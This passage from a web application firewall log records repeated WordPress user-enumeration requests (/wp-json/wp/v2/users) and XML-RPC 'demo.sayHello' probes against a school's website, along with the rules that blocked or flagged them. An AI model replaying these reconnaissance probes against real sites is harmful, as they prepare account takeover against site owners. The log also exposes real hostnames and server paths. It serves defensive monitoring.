"%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746660023310495 3006 (- - -) Stopwatch2: 1746660023310495 3006; combined=1258, p1=448, p2=775, p3=0, p4=0, p5=35, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec871531-Z-- --9a4af54d-A-- [08/May/2025:06:20:25 +0700] aBvquSs5rYyn3jlLjjK9mAAAAMA 103.236.140.4 39984 103.236.140.4 8181 --9a4af54d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a4af54d-C-- demo.sayHello --9a4af54d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a4af54d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746660025429710 6475 (- - -) Stopwatch2: 1746660025429710 6475; combined=4684, p1=623, p2=3820, p3=40, p4=43, p5=94, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a4af54d-Z-- --d2f81d7c-A-- [08/May/2025:06:25:58 +0700] aBvsBis5rYyn3jlLjjK-WQAAAMo 103.236.140.4 41482 103.236.140.4 8181 --d2f81d7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d2f81d7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2f81d7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746660358124151 3511 (- - -) Stopwatch2: 1746660358124151 3511; combined=1452, p1=471, p2=949, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2f81d7c-Z-- --34a6ec04-A-- [08/May/2025:06:26:03 +0700] aBvsCys5rYyn3jlLjjK-WwAAAM8 103.236.140.4 41486 103.236.140.4 8181 --34a6ec04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.31 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --34a6ec04-C-- demo.sayHello --34a6ec04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --34a6ec04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746660363958682 6616 (- - -) Stopwatch2: 1746660363958682 6616; combined=4818, p1=619, p2=3954, p3=40, p4=44, p5=97, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34a6ec04-Z-- --ea329772-A-- [08/May/2025:06:33:49 +0700] aBvt3Ss5rYyn3jlLjjK-aQAAAMk 103.236.140.4 41524 103.236.140.4 8181 --ea329772-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ea329772-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea329772-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746660829282053 3283 (- - -) Stopwatch2: 1746660829282053 3283; combined=1441, p1=497, p2=910, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea329772-Z-- --efe4926b-A-- [08/May/2025:06:33:55 +0700] aBvt4ys5rYyn3jlLjjK-awAAAMo 103.236.140.4 41528 103.236.140.4 8181 --efe4926b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --efe4926b-C-- demo.sayHello --efe4926b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --efe4926b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746660835187869 6628 (- - -) Stopwatch2: 1746660835187869 6628; combined=4719, p1=611, p2=3866, p3=35, p4=40, p5=99, sr=79, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efe4926b-Z-- --66ef3d5e-A-- [08/May/2025:07:17:03 +0700] aBv3_ys5rYyn3jlLjjK-rQAAANA 103.236.140.4 41802 103.236.140.4 8181 --66ef3d5e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.180.21.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.180.21.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66ef3d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66ef3d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746663423748790 3011 (- - -) Stopwatch2: 1746663423748790 3011; combined=1302, p1=446, p2=828, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66ef3d5e-Z-- --08cdf441-A-- [08/May/2025:07:23:50 +0700] aBv5lo4K347NtBcwXKwFQwAAAIs 103.236.140.4 41832 103.236.140.4 8181 --08cdf441-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --08cdf441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08cdf441-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746663830216163 3536 (- - -) Stopwatch2: 1746663830216163 3536; combined=1510, p1=542, p2=930, p3=0, p4=0, p5=38, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08cdf441-Z-- --23f9fa14-A-- [08/May/2025:07:23:55 +0700] aBv5m6cs1DvJ_HgMHE_xeAAAAAE 103.236.140.4 41836 103.236.140.4 8181 --23f9fa14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --23f9fa14-C-- demo.sayHello --23f9fa14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --23f9fa14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746663835939861 4771 (- - -) Stopwatch2: 1746663835939861 4771; combined=3739, p1=489, p2=2988, p3=23, p4=24, p5=153, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23f9fa14-Z-- --85da726a-A-- [08/May/2025:07:24:18 +0700] aBv5ssP9GxxPAbCroFbMiQAAAEA 103.236.140.4 41840 103.236.140.4 8181 --85da726a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --85da726a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85da726a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746663858140776 3311 (- - -) Stopwatch2: 1746663858140776 3311; combined=1448, p1=504, p2=911, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85da726a-Z-- --92cb9112-A-- [08/May/2025:07:24:25 +0700] aBv5uY4K347NtBcwXKwFRgAAAJI 103.236.140.4 41846 103.236.140.4 8181 --92cb9112-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --92cb9112-C-- demo.sayHello --92cb9112-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --92cb9112-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746663865643497 6832 (- - -) Stopwatch2: 1746663865643497 6832; combined=4892, p1=671, p2=3971, p3=37, p4=40, p5=102, sr=118, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92cb9112-Z-- --ed4d297b-A-- [08/May/2025:07:24:54 +0700] aBv51o4K347NtBcwXKwFRwAAAI8 103.236.140.4 41850 103.236.140.4 8181 --ed4d297b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ed4d297b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed4d297b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746663894479394 3645 (- - -) Stopwatch2: 1746663894479394 3645; combined=1520, p1=472, p2=1017, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed4d297b-Z-- --3817377a-A-- [08/May/2025:07:25:02 +0700] aBv53sP9GxxPAbCroFbMigAAAFg 103.236.140.4 41854 103.236.140.4 8181 --3817377a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3817377a-C-- demo.sayHello --3817377a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3817377a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746663902040039 5796 (- - -) Stopwatch2: 1746663902040039 5796; combined=4055, p1=566, p2=3244, p3=37, p4=36, p5=102, sr=64, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3817377a-Z-- --f2864b3c-A-- [08/May/2025:07:29:27 +0700] aBv658P9GxxPAbCroFbMjgAAAEE 103.236.140.4 41912 103.236.140.4 8181 --f2864b3c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2864b3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2864b3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664167725011 3245 (- - -) Stopwatch2: 1746664167725011 3245; combined=1440, p1=496, p2=911, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2864b3c-Z-- --4a0f2368-A-- [08/May/2025:07:29:34 +0700] aBv67o4K347NtBcwXKwFUwAAAIE 103.236.140.4 41916 103.236.140.4 8181 --4a0f2368-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.226 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a0f2368-C-- demo.sayHello --4a0f2368-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a0f2368-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664174710591 5258 (- - -) Stopwatch2: 1746664174710591 5258; combined=3722, p1=490, p2=3041, p3=32, p4=35, p5=75, sr=58, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a0f2368-Z-- --b1c66c35-A-- [08/May/2025:07:30:48 +0700] aBv7OI4K347NtBcwXKwFVAAAAIc 103.236.140.4 41926 103.236.140.4 8181 --b1c66c35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1c66c35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1c66c35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746664248498144 3553 (- - -) Stopwatch2: 1746664248498144 3553; combined=1457, p1=482, p2=943, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1c66c35-Z-- --f447d973-A-- [08/May/2025:07:30:55 +0700] aBv7Pys5rYyn3jlLjjK-tgAAAMg 103.236.140.4 41930 103.236.140.4 8181 --f447d973-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f447d973-C-- demo.sayHello --f447d973-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f447d973-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746664255293693 5322 (- - -) Stopwatch2: 1746664255293693 5322; combined=4045, p1=521, p2=3307, p3=30, p4=32, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f447d973-Z-- --1e5e3f23-A-- [08/May/2025:07:31:56 +0700] aBv7fI4K347NtBcwXKwFVgAAAII 103.236.140.4 41940 103.236.140.4 8181 --1e5e3f23-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e5e3f23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e5e3f23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 